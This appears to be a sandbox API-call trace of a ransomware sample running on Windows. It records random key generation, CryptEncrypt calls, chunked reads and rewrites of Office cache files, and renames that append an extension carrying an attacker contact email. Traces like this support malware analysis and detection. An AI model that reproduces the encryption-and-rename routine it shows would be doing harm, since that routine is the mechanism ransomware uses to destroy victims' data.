	[0091.093] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x9b6ba9f
	[0091.093] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0091.093] GetProcessHeap () returned 0x540000
	[0091.093] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0091.093] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0091.093] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0091.098] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0091.098] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100000) returned 0x3c20020
	[0091.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100000) returned 0x3d30020
	[0091.098] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.098] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.134] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.134] WriteFile (in: hFile=0x498, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.134] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.134] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.155] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000
	[0091.155] WriteFile (in: hFile=0x498, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.157] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.157] WriteFile (in: hFile=0x498, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.157] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.157] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.170] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000
	[0091.170] WriteFile (in: hFile=0x498, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.173] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.173] WriteFile (in: hFile=0x498, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.173] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.173] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.186] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000
	[0091.186] WriteFile (in: hFile=0x498, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.189] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.189] WriteFile (in: hFile=0x498, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.189] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.189] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.202] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000
	[0091.202] WriteFile (in: hFile=0x498, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.204] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.204] WriteFile (in: hFile=0x498, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.204] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.204] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.218] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000
	[0091.218] WriteFile (in: hFile=0x498, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.220] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.220] WriteFile (in: hFile=0x498, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.220] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.220] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.233] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000
	[0091.233] WriteFile (in: hFile=0x498, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0091.236] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0091.236] WriteFile (in: hFile=0x498, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.236] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3c20020 | out: hHeap=0x540000) returned 1
	[0091.241] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3d30020 | out: hHeap=0x540000) returned 1
	[0091.245] CloseHandle (hObject=0x498) returned 1
	[0091.585] GetProcessHeap () returned 0x540000
	[0091.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0091.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0091.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0091.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc178 | out: hHeap=0x540000) returned 1
	[0091.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc0d0 | out: hHeap=0x540000) returned 1
	[0091.585] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc0d0
	[0091.585] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0091.585] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0091.585] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0091.585] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0091.585] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", dwFileAttributes=0x80) returned 1
	[0091.587] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 77
	[0091.587] GetProcessHeap () returned 0x540000
	[0091.587] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8568
	[0091.587] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml"
	[0091.587] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0091.587] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0091.590] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0091.590] GetProcessHeap () returned 0x540000
	[0091.590] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0091.590] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=6421) returned 1
	[0091.590] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1915
	[0091.590] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0091.590] GetProcessHeap () returned 0x540000
	[0091.590] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0091.590] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0091.590] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0091.660] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0091.660] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.660] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1915) returned 0x5fdb78
	[0091.660] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1915) returned 0x5ff498
	[0091.660] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0091.661] ReadFile (in: hFile=0x498, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x1915, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x1915, lpOverlapped=0x0) returned 1
	[0091.661] SetFilePointer (in: hFile=0x498, lDistanceToMove=-6421, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0091.661] WriteFile (in: hFile=0x498, lpBuffer=0x5ff498*, nNumberOfBytesToWrite=0x1915, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ff498*, lpNumberOfBytesWritten=0x3a1f778*=0x1915, lpOverlapped=0x0) returned 1
	[0091.662] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0091.662] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ff498 | out: hHeap=0x540000) returned 1
	[0091.662] CloseHandle (hObject=0x498) returned 1
	[0091.663] GetProcessHeap () returned 0x540000
	[0091.663] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0091.663] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0091.663] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0091.663] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc0d0 | out: hHeap=0x540000) returned 1
	[0091.663] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc028 | out: hHeap=0x540000) returned 1
	[0091.663] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc028
	[0091.663] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0091.663] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0091.663] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0091.663] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0091.663] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi", dwFileAttributes=0x80) returned 1
	[0091.663] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 77
	[0091.663] GetProcessHeap () returned 0x540000
	[0091.663] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8568
	[0091.663] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi"
	[0091.663] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0091.664] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0091.665] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0091.666] GetProcessHeap () returned 0x540000
	[0091.666] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0091.666] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=10798080) returned 1
	[0091.666] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa4c400
	[0091.666] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0091.666] GetProcessHeap () returned 0x540000
	[0091.666] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0091.666] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0091.666] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0091.668] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0091.668] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.668] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa4c400) returned 0x3c20020
	[0091.669] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa4c400) returned 0x4670020
	[0091.670] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0091.670] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0xa4c400, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0xa4c400, lpOverlapped=0x0) returned 1
	[0092.297] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0092.297] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0092.298] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x80) returned 1
	[0092.298] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 88
	[0092.298] GetProcessHeap () returned 0x540000
	[0092.298] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x116) returned 0x5fb648
	[0092.298] lstrcpyW (in: lpString1=0x5fb648, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms"
	[0092.298] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR"
	[0092.298] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0092.302] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
